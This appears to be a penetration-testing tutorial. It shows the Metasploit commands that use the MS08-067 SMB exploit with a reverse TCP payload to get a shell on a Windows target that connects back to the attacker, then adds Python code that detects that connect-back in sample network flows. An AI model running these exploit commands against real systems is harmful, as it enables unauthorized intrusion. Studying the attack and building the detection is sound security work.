A reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine listens on a port and receives the connection that the target opens once code or command execution has been achieved on it. For this example, I will set up a reverse shell connection. The scheme is represented by the image below:
To build this scheme, I will use the ms08_067_netapi vulnerability. MS08 stands for Microsoft 2008, the year of the patch that addresses this vulnerability; 067 is the number of that year's patch (the 67th). The vulnerability is explained here.
First, I select the exploit with the command use windows/smb/ms08_067_netapi. Next I have to set the target host in RHOST: type set RHOST 131.107.1.222 to set the target IP address.
Then run show options to review what has been set up. RHOST now points to 131.107.1.222 and RPORT points to an open port on the target.
The next step is to set the payload. The payload is the code that the exploit delivers and executes on the target. To get a reverse shell this time, the payload to set is windows/shell/reverse_tcp. For a reverse shell we also need to set the listening host (LHOST), because the target connects back to this host. Set it with set LHOST 131.107.1.101. To check LHOST again, run show options.
This time, show options also displays the LHOST information. The listener on LHOST uses port 4444. The last command runs the exploit: type exploit.
There you go, I have access to a shell on the target.
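The connect-back pattern described above (an inbound connection to the target's SMB port 445, followed shortly by an outbound connection from the target to the same peer on the listener port 4444) is also what a defender can look for. The following is an added example, not part of the original post: it runs that check over a few constructed flow records; the record layout (timestamp, source, destination, destination port) and the two-minute window are assumptions.

```python
"""Flag hosts that accept a connection on a service port and then open a
connection back to the same peer shortly afterwards (reverse-shell pattern).
The flow records below are constructed for this example."""
from datetime import datetime, timedelta

SERVICE_PORT = 445              # exposed SMB service the exploit targets
WINDOW = timedelta(minutes=2)   # assumed maximum delay before the connect-back

# Constructed records: "<ISO timestamp> <src ip> <dst ip> <dst port>"
SAMPLE_FLOWS = """\
2023-01-01T10:00:01 131.107.1.101 131.107.1.222 445
2023-01-01T10:00:04 131.107.1.222 131.107.1.101 4444
2023-01-01T10:05:00 131.107.1.50 131.107.1.222 445
2023-01-01T10:30:00 131.107.1.222 131.107.1.9 443
"""


def parse_flows(text):
    """Parse flow lines into (timestamp, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def find_connect_backs(flows, host, service_port=SERVICE_PORT, window=WINDOW):
    """Return (peer, inbound_time, outbound_time, outbound_port) for every
    peer that connected to `host` on service_port and then received an
    outbound connection from `host` within `window`."""
    flows = sorted(flows)
    hits = []
    for ts_in, src, dst, dport in flows:
        if dst != host or dport != service_port:
            continue  # only inbound hits on the exposed service start a pair
        for ts_out, src2, dst2, dport2 in flows:
            if src2 == host and dst2 == src and ts_in <= ts_out <= ts_in + window:
                hits.append((src, ts_in, ts_out, dport2))
    return hits


if __name__ == "__main__":
    for peer, t_in, t_out, port in find_connect_backs(parse_flows(SAMPLE_FLOWS), "131.107.1.222"):
        print(f"connect-back to {peer}:{port} at {t_out} after inbound {SERVICE_PORT} at {t_in}")
```

Only the 131.107.1.101 pair is flagged; the later SMB connection from 131.107.1.50 has no matching outbound flow, and the outbound HTTPS connection at 10:30 has no preceding inbound hit.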
References:
- https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
- http://resources.infosecinstitute.com/icmp-reverse-shell/